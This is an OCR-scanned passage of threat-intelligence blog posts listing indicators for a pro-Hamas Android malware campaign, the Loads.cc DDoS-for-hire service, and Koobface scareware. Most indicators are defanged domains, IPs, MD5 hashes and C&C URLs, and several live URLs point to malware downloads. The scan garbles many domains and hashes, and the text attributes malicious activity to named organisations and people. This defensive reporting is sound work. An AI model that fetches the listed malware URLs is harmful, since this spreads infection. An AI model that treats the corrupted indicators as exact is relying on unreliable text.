hxxp://inerpied.tk 

hxxp://limiterprsident.tk 

hxxp://resteraffaire.tk 

hxxp://laisserloi.tk 

hxxp://treterre.tk 

hxxp://i resuite.tk 

hxxp://tenirair.tk 

hxxp://rganiserargent.tk 

hxxp://nelchoisirhistoire.tk 

hxxp://grertte.tk 

hxxp://oncernerpriode.tk 

hxxp://ncerchoix.tk 

hxxp://mpagnercas.tk 

hxxp://permesure.tk 



hxxp ://u ri rprod u it.tk 

hxxp://relieu.tk 

hxxp://sderplan.tk 

hxxp://prparerchance.tk 

hxxp://hergestion.tk 

hxxp://disposerpouvoir.tk 

hxxp://isirtat.tk 

hxxp://dercoup.tk 

hxxp://frersource.tk 

hxxp://suivreobjet.tk 

hxxp://itteranne.tk 

hxxp://anisertude.tk 

hxxp://pparatrecouleur.tk 

hxxp://trouverplaisir.tk 

hxxp://sterenfant.tk 

hxxp://ttervente.tk 

hxxp://ntirgestion.tk 

hxxp://rouverdveloppement.tk 

hxxp://nnelfalloirchoix.tk 

hxxp://merdemande.tk 



hxxp ://n nel I i reappl ication .tk 

hxxp://ercoup.tk 

hxxp://tgrertte.tk 

hxxp://moyen.tk 

hxxp://duirecorps.tk 

hxxp://rerespecterministre.tk 
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hxxp://mposerconseil.tk 

hxxp://nnatrevaleur.tk 

hxxp://choisirfemme.tk 

hxxp://nsidreran.tk 

hxxp://rderdomaine.tk 

hxxp://nuerweb.tk 

hxxp://attrecentre.tk 

hxxp://raiterbesoin.tk 

hxxp://leresprit.tk 




hxxp://ontenirforme.tk 

hxxp://nirfonction.tk 

hxxp://cherg roupe.tk 

hxxp://rtte.tk 

hxxp://epied.tk 

hxxp://erparis.tk 



hxxp ://l iserpouvoi r.tk 

hxxp://rtagertype.tk 

hxxp://reconnatrefemme.tk 

Related malicious and fraudulent domains known to 
have responded to 37.230.116.105: 

hxxp ://l pou rsuivretat.tk 

hxxp://gycazyuge.tk 

hxxp://optygyty.tk 

hxxp://hurevente.tk 

hxxp://kofojok.tk 

hxxp://expliopjipn.tk 

hxxp://nijiscy.tk 

hxxp://mprendreauteur.tk 

hxxp://vertravers.tk 

hxxp://truirefrance.tk 

hxxp://lokodasre.tk 

hxxp://prendrecorps.tk 

hxxp://iokoivefi kolf.tk 

hxxp://hudabertee.tk 

hxxp://larereffet.tk 



hxxp://husanuie.tk 

hxxp://pocokie.tk 

hxxp://gysazatre.tk 
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hxxp://ssurercentre.tk 

hxxp://iperuvre.tk 

hxxp://ferfreau.tk 

hxxp://poserscurit.tk 

hxxp://jidytzae.tk 

hxxp://jikogyda.tk 

hxxp://tirsystme.tk 

hxxp://thermesure.tk 

hxxp://plaisij ir.tk 

hxxp://tyferet.tk 

hxxp://irefrance.tk 

hxxp://sedkorlor.tk 

hxxp://serfille.tk 

hxxp://ruiyrgion.tk 

hxxp://permettretravers.tk 

hxxp://lpouruiretat.tk 



hxxp://fournirplupart.tk 

hxxp://roposergenre.tk 

hxxp://tircadre.tk 

hxxp://reconnatrechef.tk 

hxxp://oiril.tk 

hxxp://enterguerre.tk 

hxxp://irvaleur.tk 

hxxp://irsocit.tk 

hxxp://hugersoir.tk 

hxxp://jokofasa.tk 

hxxp://gyrecersa.tk 

hxxp://ekotyfereen.tk 

hxxp://kosazagerr.tk 

hxxp://ioterexu.tk 

hxxp://voirirguerre.tk 

hxxp://stermain.tk 

hxxp://kokofete.tk 

hxxp://uiregy.tk 

hxxp://lodokiv.tk 

hxxp://nedfuheihg.tk 



hxxp://koduhutr.tk 

hxxp://husadere.tk 

hxxp://gytedexen.tk 

hxxp://jisazabyt.tk 

hxxp://potycerer.tk 

hxxp://lopotyre.tk 

hxxp://huqerwerite.tk 

hxxp://rtircouleur.tk 

hxxp://tirhujmort.tk 

hxxp://huderesen.tk 

hxxp://expliqueren.tk 

hxxp://uihytyf.tk 

hxxp://ikiryve.tk 

hxxp://jisazajic.tk 
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hxxp://hudasarete.tk 

hxxp://potijife.tk 

hxxp://lsejikog.tk 

hxxp://gytlsentirsite.tk 

hxxp://tiosuivremillion.tk 



hxxp://kojerconseil.tk 

hxxp://okinterlien.tk 

hxxp://tenterargent.tk 

hxxp://eord re.tk 

hxxp://onterami.tk 

hxxp://vrirvente.tk 

hxxp://nerbesoin.tk 

hxxp://nertiko.tk 

hxxp://geolorge.tk 

hxxp://gyvercherdroit.tk 

hxxp://bokosabe.tk 

hxxp://lsjifferde.tk 

hxxp://dyjursite.tk 

hxxp://lopofibut.tk 

hxxp://cevoirguerre.tk 

hxxp://atteindreair.tk 

hxxp://ardermillion.tk 

hxxp://koiterplace.tk 

hxxp://travaillersite.tk 

hxxp://cuperquipe.tk 



hxxp://fe rdplaisi r.tk 

hxxp://lsentirsite.tk 

hxxp://tsuivremillion.tk 

hxxp://eciotersystme.tk 

hxxp://orterc ration.tk 

hxxp://koeioijfgel.tk 

hxxp://ituerexemple.tk 

hxxp://olravaillersant.tk 

hxxp://poloeioijfgel.tk 

hxxp://pliquerformation.tk 

hxxp://tsortirgouvernement.tk 

hxxp://vkoj rguerre.tk 

hxxp ://kij i i rrai son .tk 

hxxp://ndreterme.tk 

hxxp://iterplace.tk 

hxxp://oposerprojet.tk 

hxxp://ldclarerplace.tk 

hxxp://permort.tk 
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Related malicious and fraudulent domains known to 
have participated in the campaign (138.68.113.179; 

172.64.196.39; 172.64.197.39; 104.27.170.199; 
104.27.171.199): 

hxxp://click.newsfeed.support 

hxxp://soprano.newsfeed.support 

hxxp://clarify.newsfeed.support 

hxxp://theater.newsfeed.support 

hxxp://impress.newsfeed.support 

hxxp://urgency.newsfeed.support 

hxxp://thinker.newsfeed.support 

hxxp://g lasses, newsfeed.support 

hxxp://qualify.newsfeed.support 

hxxp://warning. newsfeed.support 

hxxp://scandal.newsfeed.support 

hxxp://mini mum. newsfeed.support 

hxxp://general.newsfeed.support 

hxxp://g I impse.newsfeed.support 

hxxp://extreme. newsfeed.support 

hxxp://officer. newsfeed. support 

hxxp://silence.newsfeed.support 



hxxp://capital.newsfeed.support 
hxxp://voucher.newsfeed.support 
hxxp://dentist.newsfeed.support 
1 . 

https://www.f1ashooint-intel.com/blo a /after-action-report- 

f1ashpoint-remediation-of-0-dav-exploit-on-our 

- public-facin a -website/ 

2. https://www.scma a azine.com/home/securit v- 
news/flashpoint-our-site-was-not-dishin a -malware/ 

3. 

https://www.anti-malware.name/news/expert-accused-intel- 

flashpoint-website-in-spread-of-malware-while-co 

m oanv-denies-accusations/ 

4. https://www.enterprisetimes.co.uk/2019/04/26/flashPoint- 
reacts-to-claim-website-served-malware/ 

5. https://news.rambler.ru/internet/42088442-sa vt- 
fl ash point-rasorostranvaet-vredonos-fl ash point-net/ 

6. https://www.f1ashpoint-intel.com/ 
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Exposing Yet Another Currently Active Fraudulent 
and Malicious Pro-Hamas Online Infastructure 

(2019-05-04 19:45) 

Love them or hate them - the ubiquitous beautiful girl 
utilizing fake bogus and rogue Facebook accounts scam 

campaign courtesy of Hamas targeting Israeli soldiers has to 
come to an end. 

In this post I'll provide actionable intelligence on a currently 
active Pro-Hamas malicious and fraudulent infras¬ 
tructure and will discuss in-depth the tactics techniques and 
procedures of the cybercriminals behind it and will 

offer in-depth perspective on a currently active Pro-Hamas 
hosting provider -" [lJNepras for Media & IT' which is 
basically a legitimate front-end company currently involved 
in a variety of Pro-Hamas malicious and fraudulent 

malware-serving and propaganda spreading online 
infrastructure provider directly related to yet another Pro- 
Hamas 

franchise -" Modern Tech Corp". 

Sample Facebook Profile Names involved in the 
campaign: 

Elianna Amer 

Aitai Yosef 


Karen Cohen 


Amit Cohen 


Loren Ailan 
Verena Sonner 
Lina Kramer 

Sample profile photos of Pro-Hamas fake and rogue 
Facebook accounts: 
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Sample malicious and fraudulent URL known to have 
participated in the campaign: 

hxxp://apkpkg.com/android/?product=yeecallpro - 
50.63.202.43; 50.87.148.131; 50.63.202.56 

Related malicious MD5s known to have participated 
in the campaign: 

MD5: 8flb709ae4fb41b32674ca8c41bfcbf7 

MD5:95a782bd8711acl4ad76b068767515d7 

MD5:5b2aac6372deal67c737b0036elbd515 

MD5: f6ffa064a492e91854d35e7f225bl313 

MD5: b3e40659ae0a0852e2f6eb928d402d9d 

MD5: 7a9503152b4c8clee80ac7daf5405a91 

Related malicious and fraudulent domains known to 
have participated in the campaign: 

hxxp://gold ncup.com 

hxxp://glancelove.com - 204.11.56.48; 

198.54.117.1; 

198.54.117.198; 

198.54.117.200; 

198.54.117.197; 


192.64.118.163 



hxxp://autoandroidup. website 
hxxp://mobilestoreupdate. website 
hxxp://updatemobapp. website 

Related malicious IPs known to have participated in 
the campaign: 

hxxp://107.175.144.26 

hxxp://192.64.114.147 
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Related malicious MD5s known to have participated 
in the campaign: 

MD5: 4f9383ae4d0285aeb86e56797f3193f7 

MD5:95a782bd8711acl4ad76b068767515d7 

MD5: b3e40659ae0a0852e2f6eb928d402d9d 

MD5: f6ffa064a492e91854d35e7f225bl313 

MD5: 8flb709ae4fb41b32674ca8c41bfcbf7 

MD5: 5b2aac6372deal67c737b0036elbd515 

MD5: 7a9503152b4c8clee80ac7daf5405a91 

Related malicious and fraudulent phone-back C &C 
server IPs: 

hxxp://end pointup.com/update/upfolder/updatefun.php 
hxxp://d roidback.com/pockemon/squirtle/functions.php 



Related malicious and fraudulent domains known to 
have participated in the campaign: 

hxxp://and roidbak.com 

hxxp://d roidback.com 

hxxp://end pointup.com 

hxxp://siteanalysto.com 

hxxp://goodydaddy.com 

Related emails known to have participated in the 
campaign: 

info@palgoal.ps 

support@nepras.com 

mtcg@mtcgaza.com 

Related fraudulent and malicious domains known to 
have been registered using the same email - 
info@palgoal.ps: 

hxxp://7qlp.com 

hxxp://all-inl.net 

hxxp://and roidmobgate.com 

hxxp://arabston ight.com 

hxxp://col lectrich.com 

hxxp://krmalk.com 



hxxp://moti onsgraphic.com 
hxxp://orch idcollege.com 
hxxp://paltrainers.org 
hxxp://rosomat.net 
hxxp://sti kerscloud.com 

Related fraudulent and malicious domains known to 
have been registered using the same email - sup- 

port@nepras.com: 

hxxp://acchd.net 

hxxp://ahlu lquran.com 

hxxp://alalbait.ps 

hxxp://a I norhan.com 

hxxp://alowini.com 

hxxp://alresalah.news 

hxxp://alshibl.com 

hxxp://alwanbook.com 

hxxp://a rqamschools.com 

hxxp://azarcnc.com 
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hxxp://boxmarket.org 



hxxp://bstcover.com 

hxxp://caades.org 

hxxp://detour-bs.com 

hxxp://d riverup2date.com 

hxxp://d rmazen.com 

hxxp://drmazen.ps 

hxxp://eta-water.com 

hxxp://fares-alarab.com 

hxxp://feker.net 

hxxp://fekerjaded.net 

hxxp://fekerjaded.com 

hxxp://gaza-hea lth.com 

hxxp://gcstv.tv 

hxxp://hai rgenomics.com 

hxxp://idco. center 

hxxp://i si ami cbl.com 

hxxp://khal edjuma.net 

hxxp://kingtoys.ps 

hxxp ://l earn ingoutcome.net 

hxxp ://l emaghi.com 



hxxp://lsugaza.org 
hxxp://mai I si nfo.net 
hxxp://maj allaa.com 
hxxp://manara.ps 
hxxp://mobi lyapp.com 
hxxp://mtsc.tech 
hxxp://nepras.net 
hxxp://nepras.ps 
hxxp://nsms.ps 
hxxp://osamaal najjar.com 
hxxp://osra tyorg.com 
hxxp://panorama-pvs.com 
hxxp://pay2earn.net 
hxxp://pharmahome.net 
hxxp://saqacc.com 
hxxp://saud ifame.com 
hxxp://scc-on I ine.net 
hxxp://sondooq.net 
hxxp://syada.org 
hxxp://ta kafulsys.com 



hxxp://taqat.work 

hxxp://taqat.jobs 

hxxp://technol ogylotus.com 

hxxp://thoraya.net 

hxxp://vgsat.com 

hxxp://yabous.net 

hxxp://yourav.net 

Related domains registered using "Nepras for Media 
& IT" infrastructure: 
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hxxp://goog lemapsservice.com 
hxxp://l ipidgenomics.com 
hxxp://akalgroup.net 
hxxp://rami-kerena wi.com 
hxxp://bestyl eperfumes.com 
hxxp://azarcnc.com 
hxxp://go-2web.com 
hxxp://j ettafood.com 
hxxp://mushtahatou rs.com 
hxxp://pa!4news.net 



hxxp://pcr-shate.com 
hxxp://saqacc.com 
hxxp://shah idvideo.com 
hxxp://shop8d.net 
hxxp://spermgenomics.com 
hxxp://tawj ihips.com 
hxxp://vi dioarb.com 
hxxp://yourav.net 
hxxp://you rdialerpal.com 
hxxp://freedombeacon.info 
hxxp://neprastest.info 
hxxp://n irmaali.com 
hxxp://zai baq-hearing.com 
hxxp://bramgsoft.com 
hxxp://hai rgenomics.com 
hxxp://d ietgenomix.com 
hxxp://arcad ialanguages.com 
hxxp://h imoudco.com 
hxxp://moltkaa.com 
hxxp://toyoorj anna.com 



hxxp://facebootshe.com 
hxxp://facebootshe.net 
hxxp://somoood.com 
hxxp://a I norhan.com 
hxxp://a I watantoday.net 
hxxp://elianali.com 
hxxp://sspal.net 
hxxp://hi-ga laxy.com 
hxxp://youthn.net 
hxxp://g mamalaysia.com 
hxxp://cbspgaza.com 
hxxp://madari kmedia.com 
hxxp://website-testnew.com 
hxxp://chi ldworldsociety.com 
hxxp://netmarketpal.net 
hxxp://a I bwwaba.com 
hxxp://saudib.info 
hxxp://pwaha.com 
hxxp://smi lymedia.com 
hxxp://ftyatalghad.com 
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hxxp ://col dymedia.com 
hxxp://kh-al sendawy.com 
hxxp://scoutsyal la.com 
hxxp ://a I mofker.com 
hxxp ://rawnaq media, net 
hxxp://pro-stud.com 
hxxp ://shawa-plast.com 
hxxp://eta-water.com 
hxxp ://host4tech. net 
hxxp ://fekerjaded.com 
hxxp ://aud ioodrivers.com 
hxxp ://trsan web.com 
hxxp ://3al mpro.com 
hxxp ://neprasweb. info 
hxxp ://thaqefnafsak.net 
hxxp://newpal21.com 
hxxp ://ads4market. net 
hxxp ://qcpal estineforum.net 
hxxp ://a I othmanx.com 



hxxp://detou rbs.com 

hxxp://engash.com 

hxxp://anafenyx.com 

hxxp://dar-pal.com 

hxxp://l oyal-hands.com 

hxxp://sahabacomplex.net 

hxxp://log intest, info 

hxxp://mapartnr.com 

hxxp://hej azeceramics.com 

hxxp://gazaapeal.com 

hxxp://ta wzzef.com 

hxxp://gazaappeal.com 

hxxp://oqpizza.com 

hxxp://a rqamschools.com 

hxxp://nafhacenter.com 

hxxp://hal aalmasry.com 

hxxp://q9polls.com 

hxxp://q8-polls.com 

hxxp://pal a lghadschool.com 

hxxp://servesni.com 



hxxp://rose2020.com 
hxxp://km-pal.com 
hxxp://cfpalesti ne.com 
hxxp ://i pad 2 me.com 
hxxp://a rabsdownload.com 
hxxp ://proj ectsinturkey.com 
hxxp ://newmassa. com 
hxxp ://charitysys. info 
hxxp ://nepraswebsite.com 
hxxp://iquds.com 
hxxp://yabous.net 
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hxxp://appsapkandroid.us 
hxxp ://a I Itech4arab.com 
hxxp://hadaf.info 
hxxp://pl medgroup.com 
hxxp ://mod hish.net 
hxxp://mltaka.com 
hxxp://ajelapp.com 
hxxp://khmap.com 



hxxp://cupsport.net 
hxxp://a rshdnytech.com 
hxxp://g maedu.net 
hxxp ://l emaghi.com 
hxxp://creati vityjob.com 
hxxp ://i mes-group.net 
hxxp ://ra wnaqmedia.com 
hxxp ://a I wan book.com 
hxxp ://fifafoot.com 
hxxp://sportarabs.com 
hxxp ://el-qa lam.com 
hxxp ://bawad irsoft.com 
hxxp ://pal a lghad-school.com 
hxxp ://mixed work.com 
hxxp://pl medgroup.com 
hxxp://alowini.com 
hxxp://detour-bs.com 
hxxp ://earn ingoutcome.net 
hxxp ://shahedcom.com 
hxxp ://sport-kora.com 



hxxp://torathshop.com 
hxxp://newsol ararabian.com 
hxxp://h3sk.com 
hxxp://g h-gaza91.com 
hxxp://watan ps.com 
hxxp://mobi lyapp.com 
hxxp://nfs-pal.com 
hxxp://yousefl23.com 
hxxp://alhato.com 
hxxp://a lyawmpress.net 
hxxp://tech nologylotus.com 
hxxp://qaval ues.com 
hxxp://ask2play.net 
hxxp://hamasld.com 
hxxp://bhscfood.com 
hxxp://n manews.com 
hxxp://ifcdoha4.com 
hxxp://sparkpowerco.net 
hxxp://a rchour.com 
hxxp://n manews.net 



hxxp://academy-uk.net 
hxxp://tu rkey-gate.com 
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hxxp ://l earn ingoutcome.net 
hxxp://smattrix.com 
hxxp://eradaa.net 
hxxp://paltoday.com 
hxxp ://sugar-salt. net 
hxxp://boutiqobasket.com 
hxxp://ethadal pad ia.com 
hxxp ://fonou ngallery.com 
hxxp ://fonou ngallery.com 
hxxp ://smattrix. com 
hxxp ://gazawi it.com 
hxxp ://alfa risnt.com 
hxxp ://l ama-film.net 

Related domains registered using "Nepras for Media 
& IT" infrastructure: 

hxxp ://l ovemagazineofficial.com 

hxxp ://masmo7. com 



hxxp://mn wrna.com 
hxxp://and roidbak.com 
hxxp://fastd raid mob.com 
hxxp://treestower.com 
hxxp://aymanjoda.com 
hxxp://advfl ameco.com 
hxxp://mah moudzuaiter.com 
hxxp://l ibyatoda.com 
hxxp://mtcpal.com 
hxxp://khfami I ies.com 
hxxp://ch2t0.com 
hxxp://d wratcom.com 
hxxp://faker4.com 
hxxp://orubah.com 
hxxp://orch idcollege.com 
hxxp://yasser-a rafat.com 
hxxp://wf-hall.com 
hxxp://maharaty.net 
hxxp://addoja.net 
hxxp://arbl0.com 



hxxp://aj el-news.com 

hxxp://rosomat.net 

hxxp://sahifty.net 

hxxp://looktik.com 

hxxp://pstent.com 

hxxp://newsmagasi ne.com 

hxxp://gazass.com 

hxxp://dooown I oads.com 

hxxp://and roidmobgate.com 

hxxp://koora-fast.com 

hxxp://fitlifee.com 

hxxp://share-crowd.com 
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Related domains registered using the "Modern Tech 
Corp" Pro-Hamas fraudulent and malicious 
infrastructure: 

hxxp://atfal ocom.com 

hxxp://bopfile.com 

hxxp://djadet.com 

hxxp://ecsrs.com 

hxxp://egp-gaza.com 



hxxp ://i nfoocean.net 

hxxp://kata keety.com 

hxxp://katakeety.net 

hxxp ://l inefood.com 

hxxp://mtcpal.net 

hxxp ://nawrastv. net 

hxxp ://shobbaik.com 

hxxp://tashbik.biz 

hxxp://tashbik.com 

hxxp ://vansac-eng I ish.com 

hxxp ://wood rom.com 

hxxp://alfareeq.info 

hxxp://tashbik.info 

hxxp ://cash backsave.com 

hxxp://nerab.com 

hxxp ://down load4android.com 

hxxp://altartosi.net 

hxxp ://fostanews.com 

hxxp ://si I verdai.com 

hxxp ://sel helou.com 



hxxp://a I bassam-co.com 
hxxp://a I manar-studio.com 
hxxp://facekooora.com 
hxxp://holy landcar.com 
hxxp://qneibi.com 
hxxp://shaheen-flower.com 
hxxp://strong-k.com 
hxxp://pioneerfoodco.com 
hxxp://si nokrotex.com 
hxxp://zawiaa.net 
hxxp://a mwwal.com 
hxxp://a buamra.com 
hxxp://mad rid ista-arab.com 
hxxp://donia-fm.com 
hxxp://donia-fm.net 
hxxp://l masatfnya.com 
hxxp://dol phi nexpressl.com 
hxxp://dolphinexpressl.info 
hxxp://dol phinexpressl.net 
hxxp://rad iosurif.com 



hxxp ://sahaba-rad io.com 
hxxp://odmint.com 
hxxp://ylapin.com 
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hxxp://ylapin.net 

hxxp://mypage-pro.com 

hxxp ://mohdshei kh.com 

hxxp ://a ltelbany.com 

hxxp ://dol phi nariumtours.com 

hxxp ://a rtsofali.com 

hxxp ://menal mu heetlelkhaleej.com 

hxxp ://a I ghaidaa.com 

hxxp ://aj wad-marble.com 

hxxp ://i stakbel.com 

hxxp://istaqbel.com 

hxxp://istaqbil.com 

hxxp://istaqbl.com 

hxxp://istqbl.com 

hxxp ://esta kbel.com 

hxxp://estaqbel.com 



hxxp://estaqbil.com 

hxxp://estaqbl.com 

hxxp://estqbl.com 

hxxp://massrefy.com 

hxxp://massrify.com 

hxxp://a mwwaly.com 

hxxp://amwwaly.info 

hxxp://a mwwaly.net 

hxxp://nawrastv.com 

hxxp://stepcrm.com 

hxxp://imraish.com 

hxxp://zawiaa.com 

hxxp://3la-kefak.com 

hxxp://bsa isofamily.com 

hxxp://imraish.com 

Related malicious MD5s known to have participated 
in the campaign: 

MD5: 10f27d243adb082ce0f842c7a4a3784b01f7248e 
MD5: b8237782486a26d5397b75eeea7354a777bff63a 
MD5: 09c3af7b0a6957d5c7c80f67ab3b9cd8bef88813 



MD5: 9b923303f580c999f0fdc25cad600dd3550fe4e0 

MD5: 0b58c883efe44ff010fl703db00c9ff4645b59df 

MD5: 0a5dc47b06de545d8236d70efee801ca573115e7 

MD5:782a0e5208c3d9e8942b928857a24183655e7470 

MD5: 5f71a8a50964dae688404ce8b3fbd83d6e36e5cd 

MD5: 03b404c8f4ead4aa3970b26eeeb268c594blbb47 

Related certificates known to have participated in 
the campaign: 

10:EB:7D:03:2A:B9:15:32:8F:BF:68:37:C6:07:45:FB:DF:F1:8 

7:A6 

9E:52:71:F3:D2:1D:C3:22:28:CB:50:C7:33:05:E3:DE:01:EB: 

CB:03 

44:52:E6:4C:97:4B:6D:6A:7C:40:AD:1E:E0:17:08:33:87:AA: 

09:09 

67:43:9B:EE:39:81:F3:5E:10:33:C9:7A:D9:4F:3A:73:3B:B0: 

CF:0A 

89:C8:E2:E3:4A:23:3C:A0:54:A0:4A:53:D6:56:C8:2D:4A:8D: 

80:56 

B4:D5:0C:8B:73:CB:A9:06:8A:B3:F2:49:35:F8:58:FE:A2:3E: 

2E:3A 
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Related malicious MD5s known to have participated 
in the campaign including C &C phone-back 
locations: MD5: 8flb709ae4fb41b32674ca8c41bfcbf7 - 



once executed the sample phones back to the following 
malcious 

domain - hxxp://jonalbertwebsite.OOOwebhostapp.ee> m 

MD5: 95a782bd8711acl4ad76b068767515d7 - once 
executed the sample phones back to the following malicious 

domains - hxxp://107.175.144.26/apps/d/p/op.php -> 
hxxp://app-measurement. com/config/app/1:48705006578- 

9:android:6a899b85b 4fafd55?app _instance 
_ id= 76d4b 711 c98c3632398d4 7cb8d5777a3 
&platform=android &gmp 

_version=11200 

MD5: 5b2aac6372deal67c737b0036elbd515 

MD5: f6ffa064a492e91854d35e7f225bl313 - once 
executed the sample phones back to the followin malicious 

domain - hxxp://192.64.114.147/apps/d/p/op.php 

MD5: b3e40659ae0a0852e2f6eb928d402d9d 

MD5: 7a9503152b4c8clee80ac7daf5405a91 

Related malicious MD5s known to have participated 
in the campaign: 

MD5: flb709ae4fb41b32674ca8c41bfcbf7 
MD5:95a782bd8711acl4ad76b068767515d7 
MD5:5b2aac6372deal67c737b0036elbd515 


MD5: f6ffa064a492e91854d35e7f225bl313 



MD5: b3e40659ae0a0852e2f6eb928d402d9d 


MD5: 7a9503152b4c8clee80ac7daf5405a91 

Related malicious URL known to have participated in 
the campaign: 

hxxp://bit.ly/2M7E2Zg 

1. httPs://www.terrorism- 

info.or a .il/Data/articles/Art 2Q397/E 188 12 177323293. pd 
f 
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Historical OSINT - Profiling the Loads.cc Enterprise 
(2019-05-04 22:27) 

Remember [l]loads.cc? In this post I'll provide actionable 
intelligence on the popular DDoS for hire service circa 

2008 and offer in-depth perspective on the tactics utilized 
by the gang behind the service for the purpose of earning 

fraudulent revenue in the process of monetizing access to 
malware-infected hosts. 

Sample malicious and fraudulent infrastructure 
known to have participated in the campaign: 

hxxp://loads.cc - hxxp://nsl.udnska.cn (72.21.52.99), 
interestingly, hxxp://sateliting.cn is the C &C for 
hxxp://loads.cc service. 

Related malicious and fraudulent URLs known to 
have participated in the campaign: 

hxxp://sateliting.cn/? &v=exp6 &lid = 1033 





hxxp://sateliting.cn/? &v=iron &lid = 1033 

hxxp://sateliting.cn/? &v=1810kj &lid = 1033 

hxxp://sateliting.cn/? &v=Loko &lid = 1033 

hxxp://sateliting.cn/? &v=mporlova &lid = 1033 

hxxp://satelit-ing.cn/? &v=mporlova &lid = 1033 

hxxp://sateliting.cn/? &v=gto &lid = 1033 

Related malicious IPs known to have responded to 
sateliting.cn: 

hxxp://50.117.116.117 

hxxp://216.172.154.34 

hxxp://50.117.122.90 

hxxp://205.164.24.45 

hxxp://50.117.116.205 

hxxp://50.117.116.204 

hxxp://65.19.157.227 

Related malicious MD5s known to have participated 
in the campaign: 

MD5: eb0e25f2ac8f50590e3a00dcf766ef02 
MD5: 48cf9b8b063715bb53e691da61601a73 
MD5: 0b63dc08da40fcaf532847cfa5d9fcl2 


MD5: 0abaffe7dl9c382d6dc94e40b27fl99b 



MD5: 0844b755c7e26c8051ab23369f720a4b 


MD5: 2f3e270c37b48523e3e89ab76a012092 

1. https://ddanchev.blo as pot.com/2008/Q3/loadscc-ddos-for- 
hire-service.html 
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Historical OSINT - Massive Scareware Serving 
Campaign Spotted in the Wild (2019-05-04 22:41) 

With scareware continuing to proliferate I've recently 
intercepted a currently active malicious and fraudulent 
blackhat 

SEO campaign successfully enticing thousands of users into 
interacting with the rogue and malicious software with 

the scareware behind the campaign successfully modifying 
the HOSTS on the affected host potentially exposing the 

user to a variety of fake search engines type of rogue and 
fraudulent and malicious activity. 

In this post I'll provide actionable intelligence on the 
infrastructure behind the campaign. 

Sample malicious URL known to have participated in 
the campaign: 

hxxp://guardsys-zone.com/? 

p=WKmimHVmaWyHjsblo22EeXZeOKCfZlbVoKDb2YmHWJjO 

xaCbk 


XI 





%2Bal6orKWekJXIZWhimmVummWlo6THodjXoGJdpqmikpVu 
Z21uaHFtbl %2FEkKE %3D 

Sample malicious MD5 known to have participated in 
the campaign: 

MD5: 665480a64d4f72a33120251c968e9c28 

Once executed the sample modifies the HOSTS and 
redirects them to the following domains: 

hxxp://google-reseach.com/gfeed/click.php?q= &p = l - 
66.36.243.201 

hxxp://google-reseach.com/search.php? &aff=32210 
&saff=0 &q = 

Related malicious rogue and fraudulent URL known 
to have participated in the campaign: 

hxxp://88.85.73.139/landing/ 

Sample rogue and fraudulent payment processed 
used in the campaign: 

hxxp://safetyself.com/safereports/ - 88.85.73.139 
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Historical OSINT - Yet Another Massive Scareware 
Serving Campaign Courtesy of the Koobface Gang 

(2019-05-05 16:47) 

It's 2010 and I've recently intercepted a currently 
circulating malicious and fraudulent scareware-serving 
campaign 



courtesy of the Koobface Gang this time successfully 
typosquatting my name within its command and control 

infrastructure. 

In this post I'll provide actionable intelligence behind the 
campaign and will discuss in-depth the infrastruc¬ 
ture behind it. 

Sample malicious and fraudulent domains known to 
have participated in the campaign: 

hxxp://qjcleaner.eu/hitin.php?affid=02979 

Sample malicious MD5 known to have participated in 
the campaign: 

MD5: 8df3e9c50bb4756f4434a9b7d6c23c8c 

Once executed a sample malware phones back to: 

hxxp://212.117.160.18/install.php?id=02979 

which is basical ly our dear friends at AS44042 ROOT-AS 
root eSolutions 

Parked at the same IP where [l]Crusade Affiliates 
continue serving a diverse set of fake security software are 

also [2]more scareware domains. 

It's also worth pointing out that the Koobface gang has 
recently started typosquatting various domains using my 

name. Koobface gang is [3]typosquatting my name for 
registering domains ([4]for instance Rancho Ranchev; 
Pancho Panchev etc.) including hxxp://mayernews.com - 



which is registered to Danchev Danch 
(land ruh.a l@gmail.com). 

1. https://ddanchev.blo as pot.com/2Q09/Q9/koobface- 
botnets-scareware-business.html 

2. https://ddanchev.blo as pot.com/2QlQ/Q5/koobface- a an a- 
responds-to-10-thin as- vou.html 

3. https://ddanchev.blo as pot.com/2QQ9/Q8/movement-on- 
koobface-front-part-twQ.html 

4. https://ddanchev.blo as pot.com/2Q09/ll/koobface- 
botnets-scareware-business.html 

528 

Historical OSINT - Yet Another Massive Scareware- 
Serving Campaign Courtesy of the Koobface Gang 

(2019-05-05 17:19) 

It's 2010 and I've recently came across to yet another 
currently active sea reware-serving campaign courtesy of the 

Koobface gang this time successfully introducing a 
CAPTCHA-breaking module potentially improving the 
propagation 

and distribution scale within major social networks. 

In this post I'll discuss the campaign and provide actionable 
intelligence on the infrastructure behind it. 

Related malicious domains known to have 
participated in the campaign: 

















hxxp://goscandir.com/?uid = 13301 - 91.212.107.103 - 
hosting courtesy of [1]AS29550 - EUROCONNEX-AS 
Blueconnex 

Networks Ltd Formally Euroconnex Networks 
hxxp://ebeoxuw.cn/?u id = 13301 
hxxp://ebiezoj.cn/22/?u id = 13301 
hxxp://goscanhand.com/?uid = 13301 
hxxp://byxzeq.cn/22/?uid = 13301 

Sample malicious MD5 known to have participated in 
the campaign: 

MD5: 16575ald40f745c2e39348cl727b8552 

Once executed a sample malware phones back to: 

hxxp://in5it.com/download/lpack.jpg - the actual executable 

Related malicious MD5 known to have participated 
in the campaign: 

MD5: Id5e3d78dd7efd8878075e5dbaa5c4fd 

Related malicious MD5 known to have participated 
in the campaign: 

MD5: 6262c0cbl459adc8f278136f3cff2777 

It's worth pointing out that prior to analyzing the campaign 
it appears that the Koobface gang has recently in¬ 
troduced a CAPTCHA-breaking module which basically relies 
on the active outsourcing of the CAPTCHA-breaking 



process potentially improving the Koobface spreading and 
propagation effectiveness. 

Sample malicious URL known to have participated in 
the campaign: 

http://peacockalleyantiques.eom/.sys/? 
getexe=v2googlecheck.exe 

Sample malicious MD5 known to have participated in 
the campaign: 

MD5: Cf9729bf3969df702767f3b9al31ec2c 

Sample malicious URL known to have participated in 
the campaign: 

http://peacockalleyantiques.eom/.sys/? 
getexe=v2captcha.exe 

Sample malicious MD5 known to have participated in 
the campaign: 

MD5: f2d0dbflbllc5c2ff7e5f4c655d5e43e 

Once executed a sample phones back to the 
following C &C server IPs: 

hxxp://capthcabreak.com/captcha/?a=get &i=0 &v=14 - 
67.212.69.230 

hxxp://captchastop.com/captcha/?a=get &i = l &v=14 - 
67.212.69.230 

1. https://ddanchev.blo as pot.com/2009/Q8/movement-on- 
koobface-front-part-two.html 
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Offensive Warfare 2.0 - The Future of Cyber Warfare 

- Hacking and Cyber Security Community - Public 

Registration Now Open! (2019-05-15 10:33) 

Dear blog readers, 

I wanted to let you know of my newly launched hacking and 
security community - [l]Offensive Warfare 2.0 - 

